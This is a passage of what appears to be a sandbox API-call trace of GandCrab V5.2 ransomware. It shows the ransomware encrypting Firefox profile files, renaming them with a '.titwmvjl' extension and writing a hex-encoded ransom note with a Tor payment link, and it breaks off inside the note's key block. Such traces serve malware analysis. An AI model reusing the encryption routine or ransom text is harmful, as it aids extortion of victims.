1 [0084.313] WriteFile (in: hFile=0x2d4, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x3da, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e770*=0x3da, lpOverlapped=0x0) returned 1 [0084.314] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.314] WriteFile (in: hFile=0x2d4, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0084.316] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.320] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.321] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.321] CloseHandle (hObject=0x2d4) returned 1 [0084.321] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore.js"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore.js.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore.js.titwmvjl"), dwFlags=0x1) returned 1 [0084.322] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.322] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0084.322] lstrcmpW (lpString1="SiteSecurityServiceState.txt", lpString2=".") returned 1 [0084.322] lstrcmpW (lpString1="SiteSecurityServiceState.txt", lpString2="..") returned 1 [0084.322] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="SiteSecurityServiceState.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SiteSecurityServiceState.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SiteSecurityServiceState.txt" [0084.322] lstrlenW (lpString=".titwmvjl") returned 9 [0084.322] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SiteSecurityServiceState.txt") returned 108 [0084.322] VirtualAlloc (lpAddress=0x0, dwSize=0x118, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.323] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SiteSecurityServiceState.txt.titwmvjl") returned 117 [0084.323] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SiteSecurityServiceState.txt") returned 108 [0084.323] lstrlenW (lpString=".txt") returned 4 [0084.323] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.323] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".txt ") returned 5 [0084.323] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0084.323] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.323] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SiteSecurityServiceState.txt") returned 108 [0084.323] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SiteSecurityServiceState.txt") returned 108 [0084.323] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="desktop.ini") returned 1 [0084.323] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="autorun.inf") returned 1 [0084.323] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="ntuser.dat") returned 1 [0084.323] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="iconcache.db") returned 1 [0084.323] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="bootsect.bak") returned 1 [0084.323] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="boot.ini") returned 1 [0084.323] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="ntuser.dat.log") returned 1 [0084.323] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="thumbs.db") returned -1 [0084.323] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0084.323] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0084.323] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0084.323] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="CRAB-DECRYPT.html") returned 1 [0084.323] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="KRAB-DECRYPT.txt") returned 1 [0084.323] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="CRAB-DECRYPT.txt") returned 1 [0084.323] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="ntldr") returned 1 [0084.324] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="NTDETECT.COM") returned 1 [0084.324] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="Bootfont.bin") returned 1 [0084.324] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SiteSecurityServiceState.txt") returned 108 [0084.324] lstrlenW (lpString=".txt") returned 4 [0084.324] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.324] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".txt ") returned 5 [0084.324] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.324] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.324] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SiteSecurityServiceState.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sitesecurityservicestate.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0084.325] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.325] ReadFile (in: hFile=0x2d4, lpBuffer=0x2310000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0084.327] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.327] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.327] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0084.328] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0084.329] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.329] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.329] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0084.329] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.329] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.329] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.329] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.329] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0084.331] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0084.331] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.331] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.331] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0084.331] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.331] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.331] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.331] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.332] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0084.333] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.333] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5037b8) returned 1 [0084.333] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.333] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0084.333] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.333] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0084.333] GetLastError () returned 0x0 [0084.334] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.334] CryptDestroyKey (hKey=0x5037b8) returned 1 [0084.334] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.334] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.334] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.335] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0084.336] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.336] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503438) returned 1 [0084.339] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.339] CryptGetKeyParam (in: hKey=0x503438, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0084.339] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.339] CryptEncrypt (in: hKey=0x503438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0084.339] GetLastError () returned 0x0 [0084.339] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.340] CryptDestroyKey (hKey=0x503438) returned 1 [0084.340] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.340] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.340] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0084.340] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0084.340] ReadFile (in: hFile=0x2d4, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259e78c*=0x788, lpOverlapped=0x0) returned 1 [0084.356] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffff878, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.356] WriteFile (in: hFile=0x2d4, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x788, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e770*=0x788, lpOverlapped=0x0) returned 1 [0084.366] WriteFile (in: hFile=0x2d4, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0084.368] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.373] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.374] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.374] CloseHandle (hObject=0x2d4) returned 1 [0084.375] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SiteSecurityServiceState.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sitesecurityservicestate.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SiteSecurityServiceState.txt.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sitesecurityservicestate.txt.titwmvjl"), dwFlags=0x1) returned 1 [0084.376] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.376] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0084.376] lstrcmpW (lpString1="storage", lpString2=".") returned 1 [0084.376] lstrcmpW (lpString1="storage", lpString2="..") returned 1 [0084.376] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="storage" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage" [0084.377] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\" [0084.377] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0084.377] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.377] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0084.377] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.377] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0084.377] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.378] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0084.378] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.378] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0084.378] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.378] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.378] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\\\TITWMVJL-DECRYPT.txt") returned 109 [0084.378] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0084.380] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\